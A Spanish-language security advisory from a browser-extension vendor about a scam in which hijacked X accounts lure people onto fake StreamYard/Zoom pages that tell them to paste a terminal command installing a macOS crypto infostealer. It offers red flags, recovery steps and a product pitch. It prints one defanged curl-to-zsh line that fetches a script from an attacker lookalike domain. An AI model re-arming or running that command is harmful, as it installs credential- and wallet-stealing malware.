Compartir
ALERTA DE MALWARE

Estafa del enlace de reunión falso: la llamada de Zoom que vacía tu billetera

Alguien te escribe para grabar un pódcast o una entrevista e insiste en su propio enlace de videollamada. La página imita a StreamYard, Zoom o Teams, pero nunca abre una llamada. Muestra una pantalla de "copia y pega este comando en la Terminal". El comando canaliza un script remoto directo a tu shell, que instala en silencio un infostealer que se lleva los datos de tu navegador, los datos de tu billetera cripto, las frases semilla y las claves privadas.

Equipo de SafeBrowz Investigación de Seguridad3 de junio de 202610 min de lectura

Lo esencial primero

Si un DM te invita a grabar o a una entrevista, rechaza tu enlace de reunión normal, insiste en su propio enlace, y esa página para "entrar" te dice que copies y pegues un comando en la Terminal, detente. Eso es malware, no una reunión. El investigador on-chain ZachXBT alertó este patrón exacto en XChat (los mensajes directos de X) y advirtió que el mensaje a menudo llega desde una cuenta verificada comprometida con muchos seguidores, así que puede parecer que vino de alguien en quien confías. La página falsa imita a StreamYard, Zoom o Microsoft Teams y se aloja en un dominio imitador. Nunca abre una llamada. Muestra una pantalla de "Copia y pega el comando", y el comando canaliza un script remoto a tu shell, que instala un infostealer que roba datos del navegador, datos de billetera cripto, frases semilla y mnemónicas, claves privadas y datos de Telegram y KeyChain. Una app de videollamada falsa llamada Vortax vació a una víctima 245.000 dólares (según ZachXBT). La solución es una sola regla: una llamada real de Zoom, Teams, StreamYard o Google Meet se abre en tu navegador o en tu app ya instalada. Nunca te hace pegar un comando en la Terminal para entrar. El mismo truco de "ejecuta esto para continuar" impulsa el ataque ClickFix del falso CAPTCHA, mueve el fraude del video deepfake del CEO en Zoom y alimenta el mundo más amplio de los drenadores de billeteras cripto.

Qué alertó ZachXBT

Esto es lo que alertó ZachXBT:

El detalle que lo vuelve peligroso está entre paréntesis: la cuenta está comprometida. El anzuelo no siempre llega de un desconocido con un usuario recién creado. Puede venir de una persona real a la que sigues, cuya cuenta fue secuestrada, por lo que el mensaje puede saltarse la corazonada que normalmente te protege.

Cómo funciona la estafa del enlace de reunión falso

El montaje es social, no técnico, y sigue un guion ajustado. El DM llega de una cuenta verificada secuestrada con muchos seguidores, a menudo un influencer cripto conocido cuya cuenta fue tomada (el dueño real también es una víctima). Como el usuario es real y verificado, no hay ninguna suplantación que detectar. El gancho es amistoso y halagador: te quieren en su pódcast, en una entrevista o en una grabación rápida del estilo "únete a nosotros" en X.

Aquí está la señal que lo separa de una invitación normal. Cuando ofreces tu propio enlace, un Google Meet normal en meet.google.com, lo rechazan. Insisten en que uses su enlace, una página falsa de StreamYard en un dominio imitador como streamyard.host01eu[.]com o streamyard.appstore[.]ms. El StreamYard real vive en streamyard.com, en ningún otro lado. El dominio imitador exacto varía a lo largo de la campaña.

Luego te empujan a una computadora. Si dices que estás en el teléfono, presionan: "¿cuál es el problema con entrar desde una PC?". Eso no es curiosidad. La carga del malware es un infostealer de escritorio, dirigido sobre todo a macOS, así que te necesita en una Mac o PC, no en el móvil.

La página falsa para "entrar" no abre una llamada. Muestra una pantalla de "Copia y pega el comando" con una instrucción como "Copia y pega este comando en la Terminal y presiona Enter". Ese único paso es todo el ataque, y la siguiente sección lo desglosa.

🛡 VERIFICACIÓN EN VIVO

Prueba ese enlace de reunión antes de hacer clic

¿Te llegó un DM con un enlace de Zoom, Teams o Calendly y no estás seguro? Haz clic en cualquier dominio con punteado rojo, o pega el tuyo abajo antes de hacer clic. Nuestro motor de 3 capas (Local + APIs + IA) devuelve un veredicto en unos 3 segundos. Gratis, sin registro.

Escaneo completo con análisis IA profundo → · Ninguna URL se asocia a tu identidad.

El comando para copiar y pegar es todo el ataque

Este es un ataque del estilo ClickFix, la misma técnica detrás de las páginas del falso CAPTCHA ClickFix. No hay ningún instalador que descargar, ningún dmg que abrir. La página falsa para entrar simplemente te pide copiar una línea de texto y pegarla en la Terminal (en una Mac) o en el cuadro Ejecutar o PowerShell (en Windows), y luego presionar Enter. En el instante en que lo haces, ese comando se ejecuta con todos los privilegios de tu cuenta.

El comando es una línea de curl que descarga un script remoto y lo canaliza directo a tu shell. Canalizar una descarga directamente a un shell significa que el código se ejecuta en el momento en que llega, sin oportunidad de leerlo primero. Aquí hay una versión desactivada de lo que usa la campaña. Está rota a propósito para que no pueda ejecutarse:

NO ejecutes esto - muestra desactivada, no ejecutable
curl -kfsSL hxxps://streamyard.appstore[.]ms/macos/installation | zsh

El hxxps y el [.] están rotos a propósito para que la línea quede inerte, y el dominio y el comando exactos cambian de una víctima a otra. Lo que no cambia es la forma: descargar un script, canalizarlo a un shell, ejecutarlo al instante. En esta campaña ese script instala en silencio un infostealer y drenador de billeteras de macOS que extrae datos del navegador, datos de billetera cripto, frases semilla y mnemónicas, claves privadas, datos de Telegram y datos de KeyChain. El vaciado de la billetera llega minutos después. Nunca viste una llamada, porque nunca hubo una llamada.

La única señal que lo delata

Quita todos los disfraces y un solo hecho derrota a toda esta estafa:

Una llamada de video real, sea Zoom, Google Meet, Microsoft Teams o StreamYard, nunca te pide pegar un comando en la Terminal, el cuadro Ejecutar o PowerShell para entrar. En el instante en que una página para "entrar" muestra un comando para copiar y pegar, es malware.

Cuando entras a una llamada legítima, el enlace abre tu cliente existente o ejecuta la reunión directamente en una pestaña del navegador. No hay ningún comando que copiar, ninguna Terminal que abrir, ningún paso de shell de ningún tipo. Entrar a una videollamada es un clic, nunca un pegado. Si una "reunión" alguna vez te dice que copies algo en la Terminal, el cuadro Ejecutar o PowerShell para entrar, ese es el ataque, no un fallo. Detente y cierra la pestaña. La cura de toda la campaña es entrar a las reuniones únicamente a través de software en el que ya confías, nunca ejecutando un comando que la página de la reunión te entregue.

Señales de alerta en un DM con enlace de reunión falso

  • La invitación viene de una cuenta verificada o conocida que se siente un poco rara. Un influencer cripto con decenas de miles de seguidores de repente te escribe por un pódcast o entrevista. El usuario es real y verificado, pero la cuenta puede estar secuestrada. Una insignia de verificado no vuelve seguro al enlace.
  • Rechazan tu plataforma de reunión normal e insisten en su enlace específico. Ofreces un Google Meet normal, lo rechazan y empujan su propio enlace en su lugar. Un anfitrión genuino no tiene motivo para rechazar una invitación estándar de Meet o Zoom.
  • Te empujan a entrar desde una computadora en lugar de tu teléfono. "¿Cuál es el problema con entrar desde una PC?". El infostealer de escritorio necesita una Mac o PC, así que estar en el móvil rompe el ataque, que es exactamente por lo que te presionan a salir de él.
  • La página para "entrar" te dice que copies un comando en la Terminal. Una llamada real es un clic. En el momento en que una pantalla para entrar muestra una instrucción de "copia y pega esto en la Terminal y presiona Enter", es malware. Lo mismo vale para un comando en el cuadro Ejecutar o PowerShell.
  • El enlace se aloja en un dominio imitador. La dirección es un casi-igual, como streamyard.host01eu[.]com o streamyard.appstore[.]ms, no el real streamyard.com, zoom.us ni meet.google.com.
  • Urgencia y presión. "Salimos en vivo en cinco minutos", "el invitado anterior se pasó de tiempo, entra ya". La prisa está ahí para evitar que verifiques el dominio o pienses en ese paso de la Terminal.
  • El mensaje se siente un poco raro, incluso de alguien a quien sigues. Una redacción extraña, una petición inusual, un tono que no encaja con la persona. La cuenta puede estar comprometida. Un nombre de confianza no vuelve seguro al comando.

Por qué un mensaje de un contacto de confianza puede ser malware igual

El instinto que mantiene a salvo a la mayoría es simple: confiar en los mensajes de la gente que conoces. Esta estafa está construida para derrotar exactamente eso. La nota de ZachXBT de que "la cuenta está comprometida" es el punto entero. Cuando un atacante se apodera de una cuenta real, el DM malicioso llega con una cara que reconoces. No hay un usuario mal escrito, ni un desconocido del que sospechar, ni una suplantación que detectar. Es genuinamente la cuenta de tu contacto, solo que ya no está en sus manos.

Por eso la regla tiene que ser sobre la acción, no sobre el remitente. No importa quién parezca estar pidiendo. Si cualquier mensaje, de cualquiera, lleva a una página de reunión que te dice que pegues un comando en la Terminal, o que rechaza tu enlace de reunión normal e insiste en el suyo, la respuesta es no. Verifica a la persona por un segundo canal antes de actuar. Un mensaje rápido en otra plataforma, o una llamada a un número que ya tenías, no cuesta nada y rompe la estafa. Si quieres estudiar cómo los atacantes te investigan y eligen primero, nuestro artículo sobre spear phishing y perfilado en LinkedIn muestra cómo se personaliza el enfoque, y la estafa cripto del DM del falso admin de Telegram cubre el mismo secuestro de confianza en otra plataforma.

Lo que está en juego es real. Atacantes que se hacían pasar por Andreessen Horowitz (a16z) montaron una reunión de "pódcast" falsa usando una app de videollamada falsa llamada Vortax y vaciaron a una víctima 245.000 dólares, según ZachXBT. Actores vinculados al Estado norcoreano, rastreados como parte del grupo Lazarus, montaron reuniones falsas de Zoom y Teams para robar más de 300 millones de dólares. La investigadora de seguridad de MetaMask Taylor Monahan ha estado rastreando esas pérdidas. The Record (Recorded Future News), CoinJournal, crypto.news y CryptoSlate han documentado el libreto. Los nombres y las cifras cambian. El mecanismo, una página de reunión que te pide instalar algo, no.

Si ya ejecutaste el comando

Si pegaste ese comando en la Terminal y presionaste Enter, trata el dispositivo como comprometido y muévete rápido. La cosecha de datos ocurre en segundos, y el vaciado de la billetera viene después.

  1. Desconecta el dispositivo de internet. Apaga el Wi-Fi y desconecta el cable de red para cortar al malware del atacante. No sigas usando la máquina para nada sensible.
  2. Mueve tus fondos desde un dispositivo limpio y separado. No transfieras desde la máquina infectada. Usa un dispositivo distinto y de confianza, o una billetera de hardware que sepas que nunca se conectó a ella, para mover los activos a una billetera nueva cuya frase semilla jamás haya tocado la computadora infectada.
  3. Revoca las aprobaciones de tokens. Desde el dispositivo limpio, usa una herramienta de revocación para cancelar cualquier aprobación de token en billeteras que pudieron quedar expuestas, para que un drenador no pueda extraer tokens después. Nuestra guía sobre qué hacer cuando te roban la frase semilla recorre este paso punto por punto.
  4. Restablece las credenciales de la billetera y da por quemada la semilla. Si una semilla o clave privada estuvo en el dispositivo infectado, considérala expuesta para siempre. Genera una billetera nueva en un dispositivo limpio, nunca reutilices la semilla vieja y migra lo recuperable a la nueva dirección.
  5. Cambia las contraseñas de las cuentas guardadas en el navegador y expuestas. El malware lee los datos guardados del navegador y los de KeyChain. Desde el dispositivo limpio, cambia las contraseñas del correo, los exchanges y todo lo importante, y activa la verificación en dos pasos basada en app en todas partes.
  6. Asegura tus cuentas de mensajería. Los datos de Telegram son un objetivo. Cierra las demás sesiones, restablece tu inicio de sesión de Telegram y revisa que no haya dispositivos extra vinculados a tu cuenta de X.
  7. Borra y reinstala el sistema operativo en el dispositivo infectado. No te limites a eliminar el archivo. Una reinstalación limpia completa es la única forma confiable de asegurarte de que el ladrón y cualquier persistencia desaparecieron.

Cómo reportarlo

  • Reporta al Centro de Quejas de Delitos en Internet del FBI en ic3.gov. Presenta una denuncia con las direcciones de billetera, el enlace malicioso y la cronología si perdiste fondos o te comprometieron un dispositivo.
  • Reporta la cuenta en la plataforma. Si el DM vino de una cuenta de X o Telegram comprometida, repórtala para que la plataforma actúe y avise al dueño real.
  • Avisa a la persona real. Si reconociste al remitente, contáctalo por un canal distinto. Su cuenta probablemente está comprometida y se está usando para golpear a sus otros contactos.
  • Marca el dominio malicioso. Reportar el dominio imitador de reunión a los feeds de inteligencia de amenazas ayuda a que la página se dé de baja y protege al siguiente objetivo.

Cómo SafeBrowz bloquea esta amenaza

SafeBrowz utiliza una arquitectura de detección de 3 capas: Local + APIs + IA. El objetivo aquí es marcar la página de reunión falsa y su dominio imitador antes de que llegues siquiera a la pantalla del comando para copiar y pegar.

  • Capa 1 - Detección local: más de 60 firmas de patrones de URL, además de una base de datos de más de 550 marcas (StreamYard, Zoom, Microsoft Teams y Google Meet incluidos), más verificaciones de homógrafos y Punycode, todo ejecutándose dentro de la extensión antes de que la página se renderice. Atrapa dominios de reunión imitadores como un subdominio falso de streamyard y casos de suplantación donde un dominio que no es de StreamYard ni de Zoom sirve una página para entrar con estilo de reunión.
  • Capa 2 - Verificación de APIs: agrega los feeds de Google Safe Browsing, PhishTank, URLhaus y ScamAdviser, más más de 30 listas de TLD de estafa, para marcar dominios y páginas que alojan malware ya conocidos como maliciosos, lo que cubre muchas campañas de reunión falsa y de pegado de comandos ClickFix.
  • Capa 3 - Análisis IA profundo (Premium): análisis de contenido en más de 100 idiomas que atrapa páginas de reunión falsas totalmente nuevas en segundos, incluida una página que copia el estilo real de StreamYard, Zoom o Teams pero vive en el dominio equivocado y empuja un comando para copiar y pegar.

Las firmas de detección se derivan de investigación de inteligencia de amenazas y de nuestra base de datos interna de marcas, no de datos de navegación del usuario. SafeBrowz no almacena el historial de navegación de los usuarios.

Dónde encaja la defensa a nivel del navegador

Un filtro de DM no puede distinguir una invitación a reunión genuina de una envenenada, y el enlace imitador puede verse casi correcto. El daño empieza un clic después, en la página de reunión falsa que te dice que pegues un comando en la Terminal. El escaneo a nivel del navegador está hecho para ese momento exacto. Cuando una página con estilo de StreamYard, Zoom o Teams se renderiza en un dominio que no es el real, un escáner consciente de la marca marca la suplantación antes de que llegues siquiera a la pantalla del comando para copiar y pegar. SafeBrowz es una extensión gratuita para Chrome, Firefox y Edge (Safari muy pronto) que verifica cada URL antes de renderizarla contra una base de datos de más de 550 marcas. Instala SafeBrowz y combínalo con la única regla que vence a esta campaña: entra a las reuniones únicamente a través de software que ya tienes, y nunca pegues un comando que la página de la reunión te entregue. El mismo truco de "ejecuta esto para continuar" mueve el ataque ClickFix del falso CAPTCHA, y nuestro análisis de la estafa de phishing de la falsa actualización de Chrome muestra cómo las páginas imitadoras propagan malware en otros lados.

Instala SafeBrowz gratis

Agrega la extensión del navegador que corre todas las verificaciones de este artículo automáticamente, en cada página, antes de que se renderice. Gratis para siempre, con análisis IA profundo Premium opcional por 14,99 USD al año.

Chrome Agregar a Chrome Firefox Agregar a Firefox Edge Agregar a Edge

Ver precios y funciones Premium

Preguntas frecuentes

¿Cómo funciona la estafa del enlace de reunión falso con malware?

Un DM llega de una cuenta verificada secuestrada con muchos seguidores, a menudo un influencer cripto, invitándote a un pódcast o entrevista. Cuando ofreces un Google Meet normal, lo rechazan e insisten en su propio enlace, una página falsa de StreamYard en un dominio imitador como streamyard.host01eu.com. Te empujan a entrar desde una computadora en lugar de tu teléfono. La página para entrar nunca abre una llamada. Te dice que copies y pegues un comando en la Terminal y presiones Enter. Ese comando canaliza un script remoto a tu shell, que instala en silencio un infostealer de macOS que roba datos del navegador, datos de billetera cripto, frases semilla, claves privadas, datos de Telegram y datos de KeyChain.

¿Cómo distingo un enlace de reunión real de uno falso?

Una llamada real de Zoom, Teams, StreamYard o Google Meet se abre en tu navegador o en tu app ya instalada. Nunca te pide pegar un comando en la Terminal, el cuadro Ejecutar o PowerShell para entrar. Revisa también el dominio: las reuniones reales viven en streamyard.com, zoom.us, meet.google.com o teams.microsoft.com, no en un imitador como streamyard.host01eu.com o streamyard.appstore.ms. En el instante en que una página para entrar muestra un comando para copiar y pegar, es malware.

El DM vino de alguien que conozco. ¿Puede ser malware igual?

Sí. ZachXBT alertó que estos mensajes a menudo vienen de una cuenta verificada comprometida con muchos seguidores, así que el anzuelo puede parecer de alguien en quien confías. No hay un usuario mal escrito que detectar porque de verdad es la cuenta de tu contacto, solo que secuestrada. Juzga la acción, no al remitente: si cualquier mensaje rechaza tu enlace de reunión normal, insiste en el suyo, o lleva a una página que te dice que pegues un comando en la Terminal, no actúes. Verifica a la persona por un segundo canal primero.

¿Cuánto ha perdido la gente con esta estafa?

Una app de videollamada falsa llamada Vortax, usada por atacantes que suplantaban a Andreessen Horowitz (a16z) para una reunión de pódcast falsa, vació a una víctima 245.000 dólares, según ZachXBT. Actores vinculados al Estado norcoreano rastreados como parte del grupo Lazarus usaron reuniones falsas de Zoom y Teams para robar más de 300 millones de dólares. La investigadora de seguridad de MetaMask Taylor Monahan ha estado rastreando las pérdidas.

Pegué el comando en la Terminal. ¿Qué hago primero?

Trata el dispositivo como comprometido. Desconéctalo de internet, luego desde un dispositivo limpio y separado mueve tus fondos a una billetera nueva cuya semilla jamás haya tocado la máquina infectada, revoca las aprobaciones de tokens y restablece las credenciales de la billetera. Cambia las contraseñas de las cuentas guardadas en el navegador y expuestas, asegura tus sesiones de Telegram y X, y haz una reinstalación completa del sistema operativo en el dispositivo infectado en lugar de solo eliminar un archivo. Reporta el incidente al FBI en ic3.gov.

¿Cómo reporto una estafa de enlace de reunión falso?

En EE. UU., presenta una denuncia ante el Centro de Quejas de Delitos en Internet del FBI en ic3.gov, con las direcciones de billetera, el enlace malicioso y la cronología si perdiste fondos. Reporta la cuenta comprometida en X o Telegram para que la plataforma actúe, avisa al dueño real por un canal distinto y marca el dominio de reunión malicioso ante los feeds de inteligencia de amenazas para que la página pueda darse de baja.

Cobertura relacionada de SafeBrowz

En resumen: Una invitación a reunión no es una amenaza. Una página de reunión que te dice que pegues un comando en la Terminal sí lo es. Si un DM, incluso de un nombre verificado en el que confías, rechaza tu enlace de reunión normal, insiste en el suyo y te lleva a una página de "copia y pega este comando", ciérralo. Entra a las llamadas únicamente a través de software que ya tienes, verifica a la persona por un segundo canal y pon SafeBrowz en tu navegador para que la página de reunión falsa se marque antes de que llegues siquiera a la pantalla del comando.